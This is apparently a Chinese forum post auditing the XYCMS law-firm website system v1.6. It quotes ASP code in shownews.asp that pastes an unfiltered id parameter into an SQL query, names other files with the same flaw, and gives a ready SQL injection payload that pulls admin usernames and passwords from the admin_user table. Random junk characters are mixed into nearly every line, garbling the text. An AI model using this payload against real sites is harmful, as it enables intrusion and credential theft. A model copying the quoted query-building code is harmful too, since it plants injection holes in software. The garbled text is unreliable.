前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
* |5 C. J. I3 } 7 H+ Z! J4 B) R
淫荡分割线( n- g9 T' o2 J5 U
--------------------------------------------------------9 w* ?$ q8 H+ X) B/ A! q
# d0 e! i, a6 U3 j! K& E! ~' J审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测). \' i, K0 W/ B7 k8 n5 h8 v* m
源码地址:http://down.chinaz.com/soft/29233.htm% h+ `0 [) |% J0 D5 g2 W
" S, E* s$ u: `8 u0 ?* C! y2 A
漏洞文件:shownews.asp, ]# J* V( a5 e3 F$ g! u* G" o
漏洞代码:7-13行* c0 m: \" d: W {! U; q
8 U) m" e1 B9 D# w 2 B- X0 f. U$ {* `# `
<%
2 W- J3 }1 B( Yid=request.QueryString("id")
# ?# E! j \) p3 q
, g& N- m( z7 pset snews=server.createobject("adodb.recordset")
/ P- \4 D$ R' s" @exec="select * from [news] where id="&id
$ D- U& ?& J2 Bsnews.open exec,conn,1,1
% \+ l8 Z& U5 S%>3 L8 Z0 X L" w. |% f
# T" Q B0 o: ?7 t# f ( A- `$ e, ^% }; X) x4 l [
什么过滤都没有 直造成注入2 X6 b! C1 ?$ Q- k% G% @
~: Y3 t0 k9 e) l @注入点:http://127.0.0.1:99/shownews.asp?id=xx2 l/ q* V) n9 v, ^/ {5 [. V& k
% U3 O" J( n9 B4 Q9 [其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
6 ?& c% Q8 C; u% Y
$ R) {* k( ?) h5 H6 J4 S! l
5 z7 j8 a7 q5 q; X/ x/ qexp: union select 1,admin,password,4,5,7 from admin_user
8 i* `7 M; W# [5 E
6 Z! q. w+ d/ | h2 D8 m/ [( B9 s |